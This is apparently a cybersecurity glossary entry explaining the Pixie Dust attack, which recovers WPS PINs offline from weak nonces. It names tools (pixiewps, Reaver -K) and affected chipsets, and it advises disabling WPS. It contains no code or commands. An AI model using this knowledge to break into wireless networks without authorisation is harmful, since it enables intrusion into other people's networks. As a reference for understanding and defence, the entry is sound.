Pixie Dust Attack
What is Pixie Dust Attack?
Pixie Dust AttackAn offline attack that recovers the WPS PIN of a vulnerable access point in seconds by exploiting weak nonces in the WPS registration protocol.
The Pixie Dust attack was published in 2014 by Dominique Bongard. He observed that many access points use predictable or zero pseudo-random number generators for the E-S1 and E-S2 nonces in the WPS M3 message. Because the access point reveals the hashes E-Hash1 and E-Hash2 in M3 before the client commits, an attacker can capture a single M1-M3 exchange and brute-force the PIN halves entirely offline in seconds to minutes. Tools like pixiewps and Reaver's -K mode automate this. Chipsets from Ralink, Broadcom, Realtek and MediaTek were widely affected. The fix is to disable WPS or upgrade firmware that uses a strong PRNG.
● Examples
- 01
Capturing one M1-M3 WPS exchange and recovering the PIN with pixiewps in under 30 seconds.
- 02
Reaver -K mode breaking a Ralink-based AP without sending any online PIN attempts.
● Frequently asked questions
What is Pixie Dust Attack?
An offline attack that recovers the WPS PIN of a vulnerable access point in seconds by exploiting weak nonces in the WPS registration protocol. It belongs to the Attacks & Threats category of cybersecurity.
What does Pixie Dust Attack mean?
An offline attack that recovers the WPS PIN of a vulnerable access point in seconds by exploiting weak nonces in the WPS registration protocol.
How does Pixie Dust Attack work?
The Pixie Dust attack was published in 2014 by Dominique Bongard. He observed that many access points use predictable or zero pseudo-random number generators for the E-S1 and E-S2 nonces in the WPS M3 message. Because the access point reveals the hashes E-Hash1 and E-Hash2 in M3 before the client commits, an attacker can capture a single M1-M3 exchange and brute-force the PIN halves entirely offline in seconds to minutes. Tools like pixiewps and Reaver's -K mode automate this. Chipsets from Ralink, Broadcom, Realtek and MediaTek were widely affected. The fix is to disable WPS or upgrade firmware that uses a strong PRNG.
How do you defend against Pixie Dust Attack?
Defences for Pixie Dust Attack typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Pixie Dust Attack?
Common alternative names include: pixiewps, Offline WPS attack.
● Related terms
- attacks№ 1251
WPS Attack
An online brute-force attack on the eight-digit Wi-Fi Protected Setup PIN that recovers the WPA/WPA2 passphrase in hours.
- network-security№ 1249
WPA2
The second generation of Wi-Fi Protected Access, based on AES-CCMP and IEEE 802.11i, that has been the de facto Wi-Fi security standard since 2004.
- attacks№ 595
KRACK Attack
A key reinstallation attack against WPA2 that forces nonce reuse in the four-way handshake, letting an attacker decrypt or replay Wi-Fi traffic.
- attacks№ 837
PMKID Attack
An offline WPA/WPA2-PSK cracking method that derives the passphrase from a single PMKID field captured from an access point, no client needed.
- attacks№ 943
Rogue Access Point
An unauthorised wireless access point connected to a network, either installed maliciously by an attacker or naively by an employee, that bypasses network security controls.